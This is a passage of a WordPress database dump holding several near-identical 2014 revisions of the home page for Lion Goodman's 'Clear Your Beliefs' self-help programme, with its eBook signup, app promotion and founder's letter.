process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-20 19:55:00', '2014-11-21 00:55:00', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1844, 2, '2014-11-20 19:59:59', '2014-11-21 00:59:59', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>  A 7-week journey into your subconscious mind to delete the beliefs that hold you back. </p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-20 19:59:59', '2014-11-21 00:59:59', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1845, 2, '2014-11-20 20:01:41', '2014-11-21 01:01:41', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong></p>\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px;padding:0 5px">A 7-week journey into your subconscious mind to delete the beliefs that hold you back.</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-20 20:01:41', '2014-11-21 01:01:41', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1846, 2, '2014-11-20 20:19:59', '2014-11-21 01:19:59', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px;padding:0 5px">A 7-week journey into yoursubconscious mind to delete the beliefs that hold you back.</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-20 20:19:59', '2014-11-21 01:19:59', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1847, 2, '2014-11-20 20:21:00', '2014-11-21 01:21:00', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 10px;font-size: 16px"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px;padding:0 5px">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-20 20:21:00', '2014-11-21 01:21:00', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1848, 2, '2014-11-20 20:21:49', '2014-11-21 01:21:49', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 10px;font-size: 16px"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px;padding:0 5px">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-20 20:21:49', '2014-11-21 01:21:49', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1849, 2, '2014-11-20 21:19:55', '2014-11-21 02:19:55', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. 